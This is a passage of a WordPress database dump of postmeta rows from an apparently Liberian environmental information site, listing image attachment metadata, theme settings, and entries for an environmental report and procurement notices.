ideo_library',''),(39501,5945,'kava_extra_video_external',''),(39502,5945,'kava_extra_video_poster',''),(39503,5945,'kava_extra_video_width','770'),(39504,5945,'kava_extra_video_height','480'),(39505,5945,'kava_extra_video_loop','false'),(39506,5945,'kava_extra_video_autoplay','false'),(39507,5945,'kava_extra_video_preload','false'),(39509,5948,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1440;s:6:\"height\";i:1080;s:4:\"file\";s:60:\"2026/06/718014503_1505325968303324_8087690081882678858_n.jpg\";s:8:\"filesize\";i:341462;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22840;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"718014503_1505325968303324_8087690081882678858_n-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:222277;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8229;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132594;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32898;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:59:\"718014503_1505325968303324_8087690081882678858_n-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5524;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17834;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50223;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57936;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81623;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:61:\"718014503_1505325968303324_8087690081882678858_n-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:215726;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85191;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:60:\"718014503_1505325968303324_8087690081882678858_n-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120979;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:61:\"718014503_1505325968303324_8087690081882678858_n-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:220196;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39510,5949,'_edit_lock','1781517866:38'),(39511,5949,'_last_editor_used_jetpack','block-editor'),(39512,5950,'_last_editor_used_jetpack','classic-editor'),(39513,5950,'_edit_lock','1781612501:38'),(39514,5950,'_edit_last','38'),(39515,5951,'_wp_attached_file','2026/06/ESMP_EIC_West_Point_MMCRP_Updated.pdf'),(39516,5951,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1432541;}'),(39517,5950,'_wp_page_template','default'),(39518,5950,'download_link','https://ekmsliberia.info/wp-content/uploads/2026/06/ESMP_EIC_West_Point_MMCRP_Updated.pdf'),(39519,5950,'by','Royal Environmental Group (RE-Group)'),(39520,5950,'year','May 2026'),(39521,5950,'_pods_attached_document','a:1:{i:0;i:5951;}'),(39542,5950,'attached_document','5951'),(39523,5953,'_wp_attached_file','2026/06/Screenshot-2026-06-15-at-10.48.53.png');
INSERT INTO `wp_postmeta` VALUES (39524,5953,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1344;s:6:\"height\";i:1732;s:4:\"file\";s:45:\"2026/06/Screenshot-2026-06-15-at-10.48.53.png\";s:8:\"filesize\";i:875711;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-233x300.png\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:64819;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-06-15-at-10.48.53-795x1024.png\";s:5:\"width\";i:795;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:477582;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28086;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-768x990.png\";s:5:\"width\";i:768;s:6:\"height\";i:990;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:440463;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-06-15-at-10.48.53-1192x1536.png\";s:5:\"width\";i:1192;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:875021;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:95587;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-06-15-at-10.48.53-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17407;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58419;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:150649;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:153464;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:212083;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-06-15-at-10.48.53-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:479434;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-06-15-at-10.48.53-1344x1080.png\";s:5:\"width\";i:1344;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:573913;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-600x773.png\";s:5:\"width\";i:600;s:6:\"height\";i:773;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:306775;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-06-15-at-10.48.53-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:316256;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-06-15-at-10.48.53-1280x640.png\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:488799;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39525,5950,'_pods_document_cover_image','a:1:{i:0;i:5953;}'),(39541,5950,'document_cover_image','5953'),(39532,5954,'_last_editor_used_jetpack','classic-editor'),(39533,5954,'_edit_lock','1781610084:38'),(39534,5954,'_edit_last','38'),(39535,5954,'_wp_page_template','default'),(39536,5954,'closed_date','2026-07-06'),(39537,5954,'owner','EPA/AFDB'),(39538,5954,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2026/06/Draft-CIS_Stationeries_SBD_Version_01-1-1.docx'),(39539,5956,'_wp_attached_file','2026/06/Draft-CIS_Stationeries_SBD_Version_01-1-1.docx'),(39540,5956,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:188283;}'),(39543,5958,'_last_editor_used_jetpack','classic-editor'),(39544,5958,'_edit_lock','1781644920:38'),(39545,5959,'_edit_lock','1781645138:38'),(39546,5959,'_last_editor_used_jetpack','block-editor'),(39547,5959,'_edit_last','38'),(39548,5959,'kava_extra_enable_breadcrumbs','inherit'),(39549,5959,'post_formats',''),(39550,5959,'gallery_tab',''),(39551,5959,'kava_extra_gallery_images',''),(39552,5959,'link_tab',''),(39553,5959,'kava_extra_link',''),(39554,5959,'kava_extra_link_target','_blank'),(39555,5959,'quote_tab',''),(39556,5959,'kava_extra_quote_text',''),(39557,5959,'kava_extra_quote_cite',''),(39558,5959,'audio_tab',''),(39559,5959,'kava_extra_audio',''),(39560,5959,'kava_extra_audio_loop','false'),(39561,5959,'kava_extra_audio_autoplay','false'),(39562,5959,'kava_extra_audio_preload','false'),(39563,5959,'video_tab',''),(39564,5959,'kava_extra_video_type','library'),(39565,5959,'kava_extra_video_library',''),(39566,5959,'kava_extra_video_external',''),(39567,5959,'kava_extra_video_poster',''),(39568,5959,'kava_extra_video_width','770'),(39569,5959,'kava_extra_video_height','480'),(39570,5959,'kava_extra_video_loop','false'),(39571,5959,'kava_extra_video_autoplay','false'),(39572,5959,'kava_extra_video_preload','false'),(39573,5961,'_edit_lock','1781646217:38'),(39574,5961,'_last_editor_used_jetpack','block-editor'),(39575,5962,'_wp_attached_file','2026/06/neww1.jpeg'),(39576,5962,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1270;s:4:\"file\";s:18:\"2026/06/neww1.jpeg\";s:8:\"filesize\";i:472903;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"neww1-300x238.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:238;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27774;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"neww1-1024x813.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:813;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:240771;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"neww1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9966;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"neww1-768x610.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149599;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"neww1-1536x1219.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1219;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:451060;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"neww1-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37678;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:17:\"neww1-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6336;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:18:\"neww1-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21009;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:18:\"neww1-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55779;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:18:\"neww1-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60871;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:18:\"neww1-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88716;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:19:\"neww1-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:209967;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:20:\"neww1-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:438636;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:18:\"neww1-600x476.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:476;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97097;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:18:\"neww1-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126085;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:19:\"neww1-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216524;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39580,5961,'_edit_last','38'),(39579,5961,'_thumbnail_id','5962'),(39608,5964,'_edit_lock','1781646950:38'),(39583,5961,'kava_extra_enable_breadcrumbs','inherit'),(39584,5961,'post_formats',''),(39585,5961,'gallery_tab',''),(39586,5961,'kava_extra_gallery_images',''),(39587,5961,'link_tab',''),(39588,5961,'kava_extra_link',''),(39589,5961,'kava_extra_link_target','_blank'),(39590,5961,'quote_tab',''),(39591,5961,'kava_extra_quote_text',''),(39592,5961,'kava_extra_quote_cite',''),(39593,5961,'audio_tab',''),(39594,5961,'kava_extra_audio',''),(39595,5961,'kava_extra_audio_loop','false'),(39596,5961,'kava_extra_audio_autoplay','false'),(39597,5961,'kava_extra_audio_preload','false'),(39598,5961,'video_tab',''),(39599,5961,'kava_extra_video_type','library'),(39600,5961,'kava_extra_video_library',''),(39601,5961,'kava_extra_video_external',''),(39602,5961,'kava_extra_video_poster',''),(39603,5961,'kava_extra_video_width','770'),(39604,5961,'kava_extra_video_height','480'),(39605,5961,'kava_extra_video_loop','false'),(39606,5961,'kava_extra_video_autoplay','false'),(39607,5961,'kava_extra_video_preload','false'),(39609,5964,'_last_editor_used_jetpack','block-editor'),(39610,5965,'_wp_attached_file','2026/06/to-news.jpg'),(39611,5965,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1536;s:6:\"height\";i:2048;s:4:\"file\";s:19:\"2026/06/to-news.jpg\";s:8:\"filesize\";i:375158;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"to-news-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17076;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"to-news-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165655;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"to-news-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7752;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"to-news-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165655;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"to-news-1152x1536.jpg\";s:5:\"width\";i:1152;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:325809;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"to-news-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28609;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:18:\"to-news-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5916;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:19:\"to-news-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15401;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:19:\"to-news-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38756;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:19:\"to-news-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40897;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:19:\"to-news-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62715;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:20:\"to-news-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147095;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:21:\"to-news-1536x1080.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:319050;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:19:\"to-news-600x800.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97876;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:19:\"to-news-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87979;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:20:\"to-news-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152494;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39615,5964,'_edit_last','38'),(39614,5964,'_thumbnail_id','5965'),(39643,5967,'_edit_lock','1781647453:38'),(39618,5964,'kava_extra_enable_breadcrumbs','inherit'),(39619,5964,'post_formats',''),(39620,5964,'gallery_tab',''),(39621,5964,'kava_extra_gallery_images',''),(39622,5964,'link_tab',''),(39623,5964,'kava_extra_link',''),(39624,5964,'kava_extra_link_target','_blank'),(39625,5964,'quote_tab',''),(39626,5964,'kava_extra_quote_text',''),(39627,5964,'kava_extra_quote_cite',''),(39628,5964,'audio_tab',''),(39629,5964,'kava_extra_audio',''),(39630,5964,'kava_extra_audio_loop','false'),(39631,5964,'kava_extra_audio_autoplay','false'),(39632,5964,'kava_extra_audio_preload','false'),(39633,5964,'video_tab',''),(39634,5964,'kava_extra_video_type','library'),(39635,5964,'kava_extra_video_library',''),(39636,5964,'kava_extra_video_external',''),(39637,5964,'kava_extra_video_poster',''),(39638,5964,'kava_extra_video_width','770'),(39639,5964,'kava_extra_video_height','480'),(39640,5964,'kava_extra_video_loop','false'),(39641,5964,'kava_extra_video_autoplay','false'),(39642,5964,'kava_extra_video_preload','false'),(39644,5967,'_last_editor_used_jetpack','block-editor'),(39645,5968,'_wp_attached_file','2026/06/time-news.jpg'),(39646,5968,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:21:\"2026/06/time-news.jpg\";s:8:\"filesize\";i:85879;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"time-news-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11726;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"time-news-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72311;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"time-news-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6722;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"time-news-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47768;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"time-news-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20352;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"time-news-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4466;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"time-news-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12604;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"time-news-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28580;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"time-news-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31351;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"time-news-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42179;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:22:\"time-news-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87792;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"time-news-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33335;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"time-news-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56449;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:22:\"time-news-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92709;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39650,5967,'_edit_last','38'),(39649,5967,'_thumbnail_id','5968'),(39678,5970,'_edit_lock','1781714424:38'),(39653,5967,'kava_extra_enable_breadcrumbs','inherit'),(39654,5967,'post_formats',''),(39655,5967,'gallery_tab',''),(39656,5967,'kava_extra_gallery_images',''),(39657,5967,'link_tab',''),(39658,5967,'kava_extra_link',''),(39659,5967,'kava_extra_link_target','_blank'),(39660,5967,'quote_tab',''),(39661,5967,'kava_extra_quote_text',''),(39662,5967,'kava_extra_quote_cite',''),(39663,5967,'audio_tab',''),(39664,5967,'kava_extra_audio',''),(39665,5967,'kava_extra_audio_loop','false'),(39666,5967,'kava_extra_audio_autoplay','false'),(39667,5967,'kava_extra_audio_preload','false'),(39668,5967,'video_tab',''),(39669,5967,'kava_extra_video_type','library'),(39670,5967,'kava_extra_video_library',''),(39671,5967,'kava_extra_video_external',''),(39672,5967,'kava_extra_video_poster',''),(39673,5967,'kava_extra_video_width','770'),(39674,5967,'kava_extra_video_height','480'),(39675,5967,'kava_extra_video_loop','false'),(39676,5967,'kava_extra_video_autoplay','false'),(39677,5967,'kava_extra_video_preload','false'),(39679,5970,'_last_editor_used_jetpack','block-editor'),(39680,5971,'_last_editor_used_jetpack','classic-editor'),(39681,5971,'_edit_lock','1781717035:38'),(39682,5971,'_edit_last','38'),(39683,5971,'_wp_page_template','default'),(39684,5971,'closed_date','2026-07-06'),(39685,5971,'owner','EPA'),(39686,5971,'vacancy_link','https://ekmslibe